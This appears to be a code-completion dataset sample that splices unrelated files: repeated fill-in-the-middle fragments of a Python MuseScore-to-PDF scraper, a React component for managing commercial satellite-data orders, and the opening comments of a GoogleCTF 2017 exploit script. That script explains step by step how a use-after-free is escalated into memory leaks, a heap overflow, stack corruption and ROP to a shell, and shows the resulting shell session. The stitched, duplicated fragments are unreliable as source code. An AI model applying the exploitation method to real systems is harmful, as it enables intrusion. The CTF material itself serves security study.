proxy_server: Optional[str] = None,
):
locs: Dict[str, Any] = locals()
super().__init__(**{ k : v for k, v in locs.items() if not re.match(r"_|self$", k) })
if proxy_server:
task: asyncio.Task = asyncio.create_task(
pyppeteer.launch({"args" : ["--proxy-server=" + urlparse(proxy_server).netloc] }
), name=id(self))
else:
task: asyncio.Task = asyncio.create_task(pyppeteer.launch(), name=id(self))
async def _pyppeteer_main(
self,
url: str,
) -> List[str]:
locs = locals()
await self._check_browser()
return await super()._pyppeteer_main(
**{ k : v for k, v in locs.items() if not re.match(r"_|self$", k) })
async def close(self) -> None:
|
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_value, exc_traceback) -> None:
await self.close()
async def to_pdf(
self,
url: str,
output: Union[None, str, Path] = None,
) -> Path:
"""
Extracts the images from a MuseScore score URL asynchronously.
Then converts each one to a PDF then merges each page into one multi-page PDF.
:param url: MuseScore score URL to extract PDF from.
:type url: ``str``
:param output: File destination to write PDF to.
If ``None``, file name will be the extracted score title.
:type output: ``Union[None, str, pathlib.Path] = None``
:rtype: Output destination as ``pathlib.Path`` object.
May or may not differ depending on the output argument.
"""
return await (asyncio.wait_for(self._run(url, output), self.timeout)
if self.timeout >= 0.01 else self._run(url, output)
)
class MuseScraper(BaseMuseScraper):
def __init__(
self,
*,
debug_log: Union[None, str, Path] = None,
timeout: float = 120,
quiet: bool = False,
proxy_server: Optional[str] = None,
):
locs: Dict[str, Any] = locals()
super().__init__(**{ k : v for k, v in locs.items() if not re.match(r"_|self$", k) })
if proxy_server:
self._browser: pyppeteer.browser.Browser = asyncio.get_event_loop().run_until_complete(
pyppeteer.launch(
{"args" : ["--proxy-server=" + urlparse(proxy_server).netloc] },
)
)
else:
self._browser: pyppeteer.browser.Browser = asyncio.get_event_loop().run_until_complete(
pyppeteer.launch()
)
def __enter__(self):
return self
def close(self) -> None:
"""
Closes browser. Should be called only once after all uses.
:rtype: ``None``
"""
asyncio.get_event_loop().run_until_complete(super()._close())
def __exit__(self, exc_type, exc_value, exc_traceback) -> None:
self.close()
def to_pdf(
self,
url: str,
output: Union[None, str, Path] = None,
) -> Path:
"""
Extracts the images from a MuseScore score URL.
Then converts each one to a PDF then merges each page into one multi-page PDF.
:param url: MuseScore score URL to extract PDF from.
:type url: ``str``
:param output: File destination to write PDF to.
If ``None``, file name will be the extracted score title.
:type output: ``Union[None, str, pathlib.Path] = None``
:rtype: Output destination as ``pathlib.Path`` object.
May or may not differ depending on the output argument.
"""
return asyncio.get_event_loop().run_until_complete(
asyncio.wait_for(self._run(url, output), self.timeout) if self.timeout >= 0.01 else
self._run(url, output)
)
| """
Closes browser. Should be called only once after all uses.
:rtype: ``None``
"""
await self._check_browser()
await super()._close() | identifier_body |
MuseScraper.py | #!/usr/bin/env python3
from typing import Union, Optional, Any, List, Dict
import os
import sys
from pkgutil import get_data
from abc import ABC
import pyppeteer
import asyncio
import requests
import io
from svglib.svglib import svg2rlg
from reportlab.graphics import renderPDF
from PyPDF2 import PdfFileMerger
from pathlib import Path, PurePath
import platform
from PIL import Image
import time
import re
from urllib.parse import urlparse, quote
import logging
from logging import StreamHandler
import warnings
from operator import itemgetter
from .helper import _valid_url
class BaseMuseScraper(ABC):
def __init__(
self,
*,
debug_log: Union[None, str, Path],
timeout: float,
quiet: bool,
proxy_server: Optional[str],
):
self._debug: bool = debug_log is not None
self.timeout: float = timeout
self.closed: bool = False
self.proxy_server: Optional[str] = proxy_server
logging_kwargs: Dict[str, Any] = {}
log_level: int = (logging.DEBUG if debug_log else
logging.INFO if not quiet else
logging.WARNING
)
logging_kwargs["level"] = log_level
if debug_log:
logging_kwargs["filename"] = Path(debug_log)
# Why the hell did pyppeteer set the handler for themselves?
# They should've used logging.basicConfig() for fuck's sake
pyppeteer._logger.removeHandler(pyppeteer._log_handler)
pyppeteer_log_handler: logging.FileHandler = logging.FileHandler(debug_log)
pyppeteer_log_handler.setFormatter(pyppeteer._formatter)
pyppeteer._logger.addHandler(pyppeteer_log_handler)
logging.basicConfig(**logging_kwargs)
self._logger: logging.Logger = logging.getLogger(__name__)
async def _close(self) -> None:
if not self.closed:
await self._browser.close()
self.closed = True
else:
warnings.warn("Already closed.", RuntimeWarning)
async def _pyppeteer_main(
self,
url: str,
) -> List[str]:
page: pyppeteer.page.Page = await self._browser.newPage()
try:
page.setDefaultNavigationTimeout(0)
await page.setViewport({ "width" : 1000, "height" : 1000 } )
response: pyppeteer.network_manager.Response = await page.goto(url, timeout=0)
if not response.ok:
|
score_name: str = (
await (await (
await page.querySelector("h1")).getProperty("innerText")).jsonValue())
score_creator: str = await (await (
await page.querySelector("h2")).getProperty("innerText")).jsonValue()
async def get_score_release_date() -> int:
for h2 in await page.querySelectorAll("aside h2"):
match: Optional[re.Match] = re.fullmatch(
r"Uploaded\son\s(?P<month>[A-Z][a-z]{2})\s(?P<day>\d{1,2}),\s(?P<year>\d{4})",
await (await h2.getProperty("innerText")).jsonValue()
)
if match is not None:
break
return int(time.mktime(time.strptime(match.group("month")
+ ' ' + match.group("day").zfill(2)
+ ' ' + match.group("year"), "%b %d %Y")))
async def get_score_tags() -> str:
tags: List[str] = []
for span in await page.querySelectorAll("aside section span"):
text: str = str(await (await span.getProperty("innerText")).jsonValue())
if ((await (await (await span.getProperty(
"parentElement")).getProperty(
"href")).jsonValue()) ==
"https://musescore.com/sheetmusic?tags=" + quote(text)):
tags.append(text)
return ','.join(tags)
info_dict: Dict[str, str] = {
"Title": score_name,
"Creator": score_creator,
# "Date released": str(await get_score_release_date()),
"Keywords": await get_score_tags(),
}
imgs: List[str] = await page.evaluate(str(get_data("musescore_scraper",
"script.js",
), "utf-8"))
except:
raise
finally:
await page.close()
return {
"imgs" : imgs,
"info": info_dict,
}
def _convert(self, output: Union[None, str, Path], data: Dict[str, Any]) -> Path:
imgs, info_dict = itemgetter("imgs", "info")(data)
for k, v in info_dict.items():
self._logger.info(f'Collected "{k}" metadata from score: "{v}"')
merger: PdfFileMerger = PdfFileMerger()
def to_pdf_f(img_ext: str, contents: io.BytesIO) -> io.BytesIO:
if img_ext.startswith(".svg"):
return io.BytesIO(renderPDF.drawToString(svg2rlg(contents)))
elif img_ext.startswith(".png"):
stream: io.BytesIO = io.BytesIO()
img: Image = Image.open(contents, formats=["png"])
if img.mode == "RGBA":
img = img.convert("RGB")
img.save(stream, format="PDF")
stream.seek(0)
return stream
else:
raise NotImplementedError("Found a non-implemented image type used in given score.")
for img in imgs:
if self.proxy_server:
response: requests.Response = requests.get(img, proxies={
"http" : self.proxy_server,
"https" : self.proxy_server,
})
else:
response: requests.Response = requests.get(img)
response.raise_for_status()
img_ext: str = PurePath(urlparse(img).path).suffix
merger.append(to_pdf_f(img_ext, io.BytesIO(response.content)))
merger.addMetadata({ ('/' + k): v for k, v in info_dict.items() })
def eval_expression(input_string: str) -> str:
windows_regex: str = r"[\x00-\x1f\"*/:<>?\\|]"
darwin_regex: str = r"[: ]"
linux_regex: str = (r"[\x00/]"
if not {"is_wsl", "wsl_distro_name"} <= os.environ.keys()
else windows_regex
)
return locals()[input_string]
if isinstance(output, str) and output:
output = Path(output)
if not output or output.is_dir():
parent_folder: Optional[Path] = output
output = Path(re.sub(eval_expression(
platform.system().lower() + "_regex"), '_', info_dict["Title"]))
if parent_folder:
output = parent_folder / output
output = output.with_suffix(".pdf")
if self._debug and Path().resolve().is_relative_to(Path(__file__).parents[1]):
pdfs_folder: Path = Path("PDFs")
if not pdfs_folder.is_dir():
pdfs_folder.mkdir()
output = Path("PDFs") / output
if self._debug:
output = output.with_stem(time.strftime("%Y%m%d-%H%M%S") + ' ' + output.stem)
will_rewrite: bool = output.is_file()
with output.open("wb") as o:
merger.write(o)
output = output.resolve()
log_message: str = f'PDF { "over" * int(will_rewrite) }written to'
try:
self._logger.info(f'{log_message} "{output.relative_to(Path().resolve())}"')
except ValueError:
self._logger.info(f'{log_message} "{output}"')
return output
async def _run(self, url: str, output: Union[None, str, Path]) -> Path:
if not _valid_url(url):
raise TypeError("Invalid URL.")
return self._convert(output, await self._pyppeteer_main(url))
class AsyncMuseScraper(BaseMuseScraper):
async def _check_browser(self) -> None:
for task in asyncio.all_tasks():
if task.get_name() == str(id(self)):
self._browser = await task
break
def __init__(
self,
*,
debug_log: Union[None, str, Path] = None,
timeout: float = 120,
quiet: bool = False,
proxy_server: Optional[str] = None,
):
locs: Dict[str, Any] = locals()
super().__init__(**{ k : v for k, v in locs.items() if not re.match(r"_|self$", k) })
if proxy_server:
task: asyncio.Task = asyncio.create_task(
pyppeteer.launch({"args" : ["--proxy-server=" + urlparse(proxy_server).netloc] }
), name=id(self))
else:
task: asyncio.Task = asyncio.create_task(pyppeteer.launch(), name=id(self))
async def _pyppeteer_main(
self,
url: str,
) -> List[str]:
locs = locals()
await self._check_browser()
return await super()._pyppeteer_main(
**{ k : v for k, v in locs.items() if not re.match(r"_|self$", k) })
async def close(self) -> None:
"""
Closes browser. Should be called only once after all uses.
:rtype: ``None``
"""
await self._check_browser()
await super()._close()
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_value, exc_traceback) -> None:
await self.close()
async def to_pdf(
self,
url: str,
output: Union[None, str, Path] = None,
) -> Path:
"""
Extracts the images from a MuseScore score URL asynchronously.
Then converts each one to a PDF then merges each page into one multi-page PDF.
:param url: MuseScore score URL to extract PDF from.
:type url: ``str``
:param output: File destination to write PDF to.
If ``None``, file name will be the extracted score title.
:type output: ``Union[None, str, pathlib.Path] = None``
:rtype: Output destination as ``pathlib.Path`` object.
May or may not differ depending on the output argument.
"""
return await (asyncio.wait_for(self._run(url, output), self.timeout)
if self.timeout >= 0.01 else self._run(url, output)
)
class MuseScraper(BaseMuseScraper):
def __init__(
self,
*,
debug_log: Union[None, str, Path] = None,
timeout: float = 120,
quiet: bool = False,
proxy_server: Optional[str] = None,
):
locs: Dict[str, Any] = locals()
super().__init__(**{ k : v for k, v in locs.items() if not re.match(r"_|self$", k) })
if proxy_server:
self._browser: pyppeteer.browser.Browser = asyncio.get_event_loop().run_until_complete(
pyppeteer.launch(
{"args" : ["--proxy-server=" + urlparse(proxy_server).netloc] },
)
)
else:
self._browser: pyppeteer.browser.Browser = asyncio.get_event_loop().run_until_complete(
pyppeteer.launch()
)
def __enter__(self):
return self
def close(self) -> None:
"""
Closes browser. Should be called only once after all uses.
:rtype: ``None``
"""
asyncio.get_event_loop().run_until_complete(super()._close())
def __exit__(self, exc_type, exc_value, exc_traceback) -> None:
self.close()
def to_pdf(
self,
url: str,
output: Union[None, str, Path] = None,
) -> Path:
"""
Extracts the images from a MuseScore score URL.
Then converts each one to a PDF then merges each page into one multi-page PDF.
:param url: MuseScore score URL to extract PDF from.
:type url: ``str``
:param output: File destination to write PDF to.
If ``None``, file name will be the extracted score title.
:type output: ``Union[None, str, pathlib.Path] = None``
:rtype: Output destination as ``pathlib.Path`` object.
May or may not differ depending on the output argument.
"""
return asyncio.get_event_loop().run_until_complete(
asyncio.wait_for(self._run(url, output), self.timeout) if self.timeout >= 0.01 else
self._run(url, output)
)
| raise ConnectionError(f"Received <{response.status}> response.") | conditional_block |
MuseScraper.py | #!/usr/bin/env python3
from typing import Union, Optional, Any, List, Dict
import os
import sys
from pkgutil import get_data
from abc import ABC
import pyppeteer
import asyncio
import requests
import io
from svglib.svglib import svg2rlg
from reportlab.graphics import renderPDF
from PyPDF2 import PdfFileMerger
from pathlib import Path, PurePath
import platform
from PIL import Image
import time
import re
from urllib.parse import urlparse, quote
import logging
from logging import StreamHandler
import warnings
from operator import itemgetter
from .helper import _valid_url
class BaseMuseScraper(ABC):
def __init__(
self,
*,
debug_log: Union[None, str, Path],
timeout: float,
quiet: bool,
proxy_server: Optional[str],
):
self._debug: bool = debug_log is not None
self.timeout: float = timeout
self.closed: bool = False
self.proxy_server: Optional[str] = proxy_server
logging_kwargs: Dict[str, Any] = {}
log_level: int = (logging.DEBUG if debug_log else
logging.INFO if not quiet else
logging.WARNING
)
logging_kwargs["level"] = log_level
if debug_log:
logging_kwargs["filename"] = Path(debug_log)
# Why the hell did pyppeteer set the handler for themselves?
# They should've used logging.basicConfig() for fuck's sake
pyppeteer._logger.removeHandler(pyppeteer._log_handler)
pyppeteer_log_handler: logging.FileHandler = logging.FileHandler(debug_log)
pyppeteer_log_handler.setFormatter(pyppeteer._formatter)
pyppeteer._logger.addHandler(pyppeteer_log_handler)
logging.basicConfig(**logging_kwargs)
self._logger: logging.Logger = logging.getLogger(__name__)
async def _close(self) -> None:
if not self.closed:
await self._browser.close()
self.closed = True
else:
warnings.warn("Already closed.", RuntimeWarning)
async def _pyppeteer_main(
self,
url: str,
) -> List[str]:
page: pyppeteer.page.Page = await self._browser.newPage()
try:
page.setDefaultNavigationTimeout(0)
await page.setViewport({ "width" : 1000, "height" : 1000 } )
response: pyppeteer.network_manager.Response = await page.goto(url, timeout=0)
if not response.ok:
raise ConnectionError(f"Received <{response.status}> response.")
score_name: str = (
await (await (
await page.querySelector("h1")).getProperty("innerText")).jsonValue())
score_creator: str = await (await (
await page.querySelector("h2")).getProperty("innerText")).jsonValue()
async def get_score_release_date() -> int:
for h2 in await page.querySelectorAll("aside h2"):
match: Optional[re.Match] = re.fullmatch(
r"Uploaded\son\s(?P<month>[A-Z][a-z]{2})\s(?P<day>\d{1,2}),\s(?P<year>\d{4})",
await (await h2.getProperty("innerText")).jsonValue()
)
if match is not None:
break
return int(time.mktime(time.strptime(match.group("month")
+ ' ' + match.group("day").zfill(2)
+ ' ' + match.group("year"), "%b %d %Y")))
async def get_score_tags() -> str:
tags: List[str] = []
for span in await page.querySelectorAll("aside section span"):
text: str = str(await (await span.getProperty("innerText")).jsonValue())
if ((await (await (await span.getProperty(
"parentElement")).getProperty(
"href")).jsonValue()) ==
"https://musescore.com/sheetmusic?tags=" + quote(text)):
tags.append(text)
return ','.join(tags)
info_dict: Dict[str, str] = {
"Title": score_name,
"Creator": score_creator,
# "Date released": str(await get_score_release_date()),
"Keywords": await get_score_tags(),
}
imgs: List[str] = await page.evaluate(str(get_data("musescore_scraper",
"script.js",
), "utf-8"))
except:
raise
finally:
await page.close()
return {
"imgs" : imgs,
"info": info_dict,
}
def _convert(self, output: Union[None, str, Path], data: Dict[str, Any]) -> Path:
imgs, info_dict = itemgetter("imgs", "info")(data)
for k, v in info_dict.items():
self._logger.info(f'Collected "{k}" metadata from score: "{v}"')
merger: PdfFileMerger = PdfFileMerger()
def to_pdf_f(img_ext: str, contents: io.BytesIO) -> io.BytesIO:
if img_ext.startswith(".svg"):
return io.BytesIO(renderPDF.drawToString(svg2rlg(contents)))
elif img_ext.startswith(".png"):
stream: io.BytesIO = io.BytesIO()
img: Image = Image.open(contents, formats=["png"])
if img.mode == "RGBA":
img = img.convert("RGB")
img.save(stream, format="PDF")
stream.seek(0)
return stream
else:
raise NotImplementedError("Found a non-implemented image type used in given score.")
for img in imgs:
if self.proxy_server:
response: requests.Response = requests.get(img, proxies={
"http" : self.proxy_server,
"https" : self.proxy_server,
})
else:
response: requests.Response = requests.get(img)
response.raise_for_status()
img_ext: str = PurePath(urlparse(img).path).suffix
merger.append(to_pdf_f(img_ext, io.BytesIO(response.content)))
merger.addMetadata({ ('/' + k): v for k, v in info_dict.items() })
def eval_expression(input_string: str) -> str:
windows_regex: str = r"[\x00-\x1f\"*/:<>?\\|]"
darwin_regex: str = r"[: ]"
linux_regex: str = (r"[\x00/]"
if not {"is_wsl", "wsl_distro_name"} <= os.environ.keys()
else windows_regex
)
return locals()[input_string]
if isinstance(output, str) and output:
output = Path(output)
if not output or output.is_dir():
parent_folder: Optional[Path] = output
output = Path(re.sub(eval_expression(
platform.system().lower() + "_regex"), '_', info_dict["Title"]))
if parent_folder:
output = parent_folder / output
output = output.with_suffix(".pdf")
if self._debug and Path().resolve().is_relative_to(Path(__file__).parents[1]):
pdfs_folder: Path = Path("PDFs")
if not pdfs_folder.is_dir():
pdfs_folder.mkdir()
output = Path("PDFs") / output
if self._debug:
output = output.with_stem(time.strftime("%Y%m%d-%H%M%S") + ' ' + output.stem)
will_rewrite: bool = output.is_file()
with output.open("wb") as o:
merger.write(o)
output = output.resolve()
log_message: str = f'PDF { "over" * int(will_rewrite) }written to'
try:
self._logger.info(f'{log_message} "{output.relative_to(Path().resolve())}"')
except ValueError:
self._logger.info(f'{log_message} "{output}"')
return output
async def _run(self, url: str, output: Union[None, str, Path]) -> Path:
if not _valid_url(url):
raise TypeError("Invalid URL.")
return self._convert(output, await self._pyppeteer_main(url))
class AsyncMuseScraper(BaseMuseScraper):
async def _check_browser(self) -> None:
for task in asyncio.all_tasks():
if task.get_name() == str(id(self)):
self._browser = await task
break
def __init__(
self,
*,
debug_log: Union[None, str, Path] = None,
timeout: float = 120,
quiet: bool = False,
proxy_server: Optional[str] = None,
):
locs: Dict[str, Any] = locals()
super().__init__(**{ k : v for k, v in locs.items() if not re.match(r"_|self$", k) })
if proxy_server:
task: asyncio.Task = asyncio.create_task(
pyppeteer.launch({"args" : ["--proxy-server=" + urlparse(proxy_server).netloc] }
), name=id(self))
else:
task: asyncio.Task = asyncio.create_task(pyppeteer.launch(), name=id(self))
async def _pyppeteer_main(
self,
url: str,
) -> List[str]:
locs = locals()
await self._check_browser()
return await super()._pyppeteer_main(
**{ k : v for k, v in locs.items() if not re.match(r"_|self$", k) })
async def close(self) -> None:
"""
Closes browser. Should be called only once after all uses.
:rtype: ``None``
"""
await self._check_browser()
await super()._close()
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_value, exc_traceback) -> None:
await self.close()
async def to_pdf(
self,
url: str,
output: Union[None, str, Path] = None,
) -> Path:
"""
Extracts the images from a MuseScore score URL asynchronously.
Then converts each one to a PDF then merges each page into one multi-page PDF.
:param url: MuseScore score URL to extract PDF from.
:type url: ``str``
:param output: File destination to write PDF to.
If ``None``, file name will be the extracted score title.
:type output: ``Union[None, str, pathlib.Path] = None``
:rtype: Output destination as ``pathlib.Path`` object.
May or may not differ depending on the output argument.
"""
return await (asyncio.wait_for(self._run(url, output), self.timeout)
if self.timeout >= 0.01 else self._run(url, output)
)
class MuseScraper(BaseMuseScraper):
def __init__(
self,
*,
debug_log: Union[None, str, Path] = None,
timeout: float = 120,
quiet: bool = False,
proxy_server: Optional[str] = None,
):
locs: Dict[str, Any] = locals()
super().__init__(**{ k : v for k, v in locs.items() if not re.match(r"_|self$", k) })
if proxy_server:
self._browser: pyppeteer.browser.Browser = asyncio.get_event_loop().run_until_complete(
pyppeteer.launch(
{"args" : ["--proxy-server=" + urlparse(proxy_server).netloc] },
)
)
else:
self._browser: pyppeteer.browser.Browser = asyncio.get_event_loop().run_until_complete(
pyppeteer.launch()
)
def | (self):
return self
def close(self) -> None:
"""
Closes browser. Should be called only once after all uses.
:rtype: ``None``
"""
asyncio.get_event_loop().run_until_complete(super()._close())
def __exit__(self, exc_type, exc_value, exc_traceback) -> None:
self.close()
def to_pdf(
self,
url: str,
output: Union[None, str, Path] = None,
) -> Path:
"""
Extracts the images from a MuseScore score URL.
Then converts each one to a PDF then merges each page into one multi-page PDF.
:param url: MuseScore score URL to extract PDF from.
:type url: ``str``
:param output: File destination to write PDF to.
If ``None``, file name will be the extracted score title.
:type output: ``Union[None, str, pathlib.Path] = None``
:rtype: Output destination as ``pathlib.Path`` object.
May or may not differ depending on the output argument.
"""
return asyncio.get_event_loop().run_until_complete(
asyncio.wait_for(self._run(url, output), self.timeout) if self.timeout >= 0.01 else
self._run(url, output)
)
| __enter__ | identifier_name |
Orders.js | import React, { useEffect, useLayoutEffect, useState } from 'react';
import moment from 'moment';
import { connect } from 'react-redux';
import { t } from 'ttag';
import { OrderStatus, TPDI, TPDProvider } from '@sentinel-hub/sentinelhub-js';
import {
extractErrorMessage,
fetchOrders,
fetchUserBYOCLayers,
getBestMatchingLayer,
getBoundsAndLatLng,
formatNumberAsRoundedUnit,
showDataOnMap,
} from '../commercialData.utils';
import store, { commercialDataSlice, mainMapSlice } from '../../../store';
import { EOBButton } from '../../../junk/EOBCommon/EOBButton/EOBButton';
import { NotificationPanel } from '../../../Notification/NotificationPanel';
import ExternalLink from '../../../ExternalLink/ExternalLink';
import './Orders.scss';
const orderStatus = [
{
status: OrderStatus.CREATED,
title: () => t`Created orders (Not confirmed)`,
},
{
status: OrderStatus.RUNNING,
title: () => t`Running orders`,
},
{
status: OrderStatus.DONE,
title: () => t`Finished orders`,
},
];
const OrderProperties = {
created: {
label: () => t`Created at`,
format: (value) => moment.utc(value).format('YYYY-MM-DD HH:mm:ss'),
},
confirmed: {
label: () => t`Confirmed at`,
format: (value) => moment.utc(value).format('YYYY-MM-DD HH:mm:ss'),
},
provider: {
label: () => t`Provider`,
},
sqkm: {
label: () => t`Size`,
format: (value) => formatNumberAsRoundedUnit(value, 2, 'km²'),
},
status: {
label: () => t`Status`,
},
input: {
label: () => t`All input parameters`,
},
id: {
label: () => t`Order ID`,
},
collectionId: {
label: () => t`Collection ID`,
},
};
const JSONProperty = (order, property) => {
const [isExpanded, setIsExpanded] = useState(false);
const value = order[property];
if (!value) {
return null;
}
return (
<>
<div key={OrderProperties[property].label} className="order-property">
<div>
{OrderProperties[property] && OrderProperties[property].label()
? OrderProperties[property].label()
: property}
:
</div>
<div>
<i
className={`fa fa-eye${isExpanded ? '-slash' : ''}`}
onClick={() => setIsExpanded(!isExpanded)}
title={`${isExpanded ? t`Hide ${property} values` : t`Show ${property} values`}`}
></i>
</div>
</div>
{isExpanded && (
<div className="order-property-json">
<pre>{JSON.stringify(value, null, 2)}</pre>
</div>
)}
</>
);
};
const OrderDetails = ({ order, setAction, layer }) => {
const orderButtons = [
{
title: () => t`Confirm`,
onClick: () => setAction('confirmOrder', order),
status: [OrderStatus.CREATED],
icon: 'check',
hidden: false,
},
{
title: () => t`Delete`,
onClick: () => setAction('deleteOrder', order),
status: [OrderStatus.CREATED, OrderStatus.DONE],
icon: 'trash',
hidden: false,
},
{
title: () => t`Show coverage`,
onClick: () => {
if (order && order.input && order.input.bounds && order.input.bounds.geometry) {
store.dispatch(commercialDataSlice.actions.setSelectedOrder(order));
const { lat, lng, zoom } = getBoundsAndLatLng(order.input.bounds.geometry);
store.dispatch(mainMapSlice.actions.setPosition({ lat: lat, lng: lng, zoom: zoom }));
}
},
status: [OrderStatus.CREATED, OrderStatus.DONE, OrderStatus.RUNNING],
icon: 'crosshairs',
hidden: false,
},
{
title: () => t`Show data`,
onClick: async () => {
await showDataOnMap(order, layer);
},
status: [OrderStatus.DONE],
icon: 'map',
hidden: !layer,
},
];
return (
<div className="order-details">
<div className="order-properties">
{Object.keys(order)
.filter((property) => !['name', 'userId', 'geometry', 'input'].includes(property))
.map((property) => (
<div key={property} className="order-property">
<div>
{OrderProperties[property] && OrderProperties[property].label()
? OrderProperties[property].label()
: property}
:
</div>
<div>
{OrderProperties[property] && OrderProperties[property].format
? OrderProperties[property].format(order[property])
: order[property]}
</div>
</div>
))}
{}
</div>
{JSONProperty(order, 'input')}
{order.provider === TPDProvider.PLANET && (
<NotificationPanel>
{t`Note that it is technically possible to order more PlanetScope data than your purchased quota. Make sure your order is in line with the Hectares under Management (HUM) model to avoid overage fees.` +
` `}
<ExternalLink href="https://www.sentinel-hub.com/faq/#how-the-planetscope-hectares-under-management-works">
{t`More information`}
</ExternalLink>
</NotificationPanel>
)}
<div className="buttons">
{orderButtons
.filter((button) => button.status.includes(order.status) && !button.hidden)
.map((button, index) => (
<EOBButton
key={`${order.id}-${index}`}
onClick={() => button.onClick(order)}
text={button.title()}
title={button.title()}
icon={button.icon}
/>
))}
</div>
</div>
);
};
const Order = ({ activeOrderId, order, setAction, setActiveOrderId, refs, layer }) => {
const [showDetails, setShowDetails] = useState(order.id === activeOrderId);
useLayoutEffect(() => {
if (activeOrderId && activeOrderId === order.id)
refs[order.id].current.scrollIntoView({
behavior: 'smooth',
block: 'start',
});
}, [activeOrderId, order, refs]);
return (
<div className="order" ref={refs[order.id]}>
<div
className="order-header"
onClick={() => {
if (showDetails && activeOrderId === order.id) {
setActiveOrderId(null);
}
setShowDetails(!showDetails);
}}
>
<div className="order-title">
<div>{order.name}</div>
<div>{moment.utc(order.created).format('YYYY-MM-DD')}</div>
</div>
<div className="toggle-details">
<i className={`fa fa-chevron-${showDetails ? 'up' : 'down'}`} />
</div>
</div>
{!!showDetails && <OrderDetails order={order} setAction={setAction} layer={layer} />}
</div>
);
};
const OrdersByStatus = ({
activeOrderId,
orders,
status,
setAction,
setActiveOrderId,
title,
userByocLayers,
}) => {
const filteredOrders = orders
.filter((order) => order.status === status)
.sort((a, b) => moment.utc(b.created).diff(moment.utc(a.created)));
const refs = filteredOrders.reduce((acc, order) => {
acc[order.id] = React.createRef();
return acc;
}, {});
return (
<div className="orders-list">
<div className="order-status">{title}</div>
{filteredOrders.length ? (
<div className="orders">
{filteredOrders.map((order) => (
<Order
key={order.id}
refs={refs}
order={order}
status={status}
setAction={setAction}
setActiveOrderId={setActiveOrderId}
activeOrderId={activeOrderId}
layer={getBestMatchingLayer(userByocLayers, order.collectionId, 'TRUE')}
/>
))}
</div>
) : (
<NotificationPanel msg={t`No orders found`} type="info" />
)}
</div>
);
};
export const Orders = ({ activeOrderId, setActiveOrderId, setConfirmAction, user, themesLists }) => {
const [isLoading, setIsLoading] = useState(false);
const [error, setError] = useState(null);
const [orders, setOrders] = useState([]);
const [userByocLayers, setUserByocLayers] = useState([]);
const fetchData = async (user, themesLists) => {
try {
setIsLoading(true);
setError(null);
const allOrders = await fetchOrders(user);
const byocLayers = await fetchUserBYOCLayers(
user,
themesLists && themesLists.user_instances ? themesLists.user_instances : [],
);
setOrders(allOrders);
setUserByocLayers(byocLayers);
} catch (err) {
console.error(err);
setError(extractErrorMessage(err));
setOrders([]);
} finally {
setIsLoading(false);
}
};
useEffect(() => {
fetchData(user, themesLists);
}, [user, themesLists]);
const confirmOrderAction = async (order) => {
try {
const requestsConfig = {
authToken: user.access_token,
};
const confirmedOrder = await TPDI.confirmOrder(order.id, requestsConfig);
setActiveOrderId(order.id);
setOrders([...orders.filter((o) => o.id !== order.id), { ...confirmedOrder }]);
setConfirmAction(null);
} catch (err) {
console.error(err);
setConfirmAction({
title: () => t`Error confirming order`,
message: extractErrorMessage(err),
action: () => setConfirmAction(null),
showCancel: false,
});
}
};
const deleteOrderAction = async (order) => {
try {
const requestsConfig = {
authToken: user.access_token,
};
await TPDI.deleteOrder(order.id, requestsConfig);
setOrders(orders.filter((o) => o.id !== order.id));
if (!!activeOrderId) {
setActiveOrderId(null);
}
setConfirmAction(null);
} catch (err) {
console.error(err);
setConfirmAction({
title: () => t`Error deleting order`,
message: extractErrorMessage(err),
action: () => setConfirmAction(null),
showCancel: false,
});
}
};
const setAction = (action, order) => {
switch (action) {
case 'confirmOrder':
setConfirmAction({
title: () => t`Confirm order`,
message: t`Are you sure you want to confirm this order?`,
action: () => confirmOrderAction(order),
showCancel: true,
});
break;
case 'deleteOrder':
setConfirmAction({
title: () => t`Delete order`, | });
break;
default:
}
};
return (
<div className="commercial-data-orders">
{isLoading ? (
<div className="loader">
<i className="fa fa-spinner fa-spin fa-fw" />
</div>
) : (
orderStatus.map((item) => (
<OrdersByStatus
key={item.status}
orders={orders}
status={item.status}
title={item.title()}
setAction={setAction}
activeOrderId={activeOrderId}
setActiveOrderId={setActiveOrderId}
userByocLayers={userByocLayers}
/>
))
)}
<div className="actions-container">
<EOBButton
className="commercial-data-button"
fluid
disabled={isLoading}
onClick={() => fetchData(user, themesLists)}
text={t`Refresh orders`}
/>
</div>
{!!error && <NotificationPanel type="error" msg={error} />}
</div>
);
};
const mapStoreToProps = (store) => ({
user: store.auth.user,
themesLists: store.themes.themesLists,
selectedLanguage: store.language.selectedLanguage,
});
export default connect(mapStoreToProps, null)(Orders); | message: t`Are you sure you want to delete this order?`,
action: () => deleteOrderAction(order),
showCancel: true, | random_line_split |
snippet.py | #!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a
# pointer into the heap by confusing an Integer Value with a Property. It then
# abuses the UAF differently to create a fake String instance which is
# concatenated and returned. By faking a String in the heap, we can read
# arbitrary memory. We leak the addresses of libc and the stack. Next the
# exploit does some heap feng shui, then fakes a string with length 0xffffffXX,
# which triggers an integer overflow during string_concat(). This gives us a
# heap-based buffer overflow. With that we first corrupt a Property to point
# into the stack, then overwrite the length of the fake string with 0 to stop
# the memcpy. We leak the address of the binary from the return address. Next
# we write a value to the fake property. This writes a pointer to the heap into
# the stack. With that we corrupt only the first byte of the input buffer
# pointer so it now points further down into the stack. The next call to
# readline() by the application then writes into the stack frame of readline()
# and ultimately overwrites the return address => we get ROP:
#
# [+] Heap base @ 0x55cd3d465000
# [+] libc @ 0x7f7ea1f79000
# [+] stack @ 0x7ffcf044f448
# [+] /bin/sh @ 0x7f7ea20f9103
# [+] input_buf @ 0x7ffcf044f120
# [+] return address @ 0x7ffcf044f118
# [+] binary @ 0x55cd3c696000
# [+] offset to return address: 0x18
# [+] property name: j
# id
# uid=1337(user) gid=1337(user) groups=1337(user)
# ls
# assignment
# flag.txt
# cat flag.txt
# CTF{d0nT_tHrOw_0u7_th1nG5_yoU_5ti11_u53}
#
# Author: Samuel <saelo> Groß
#
import socket
import termios
import tty
import time
import sys
import select
import os
import re
import telnetlib
import string
from struct import pack, unpack
from binascii import hexlify, unhexlify
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Config
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#TARGET = ('localhost', 4444)
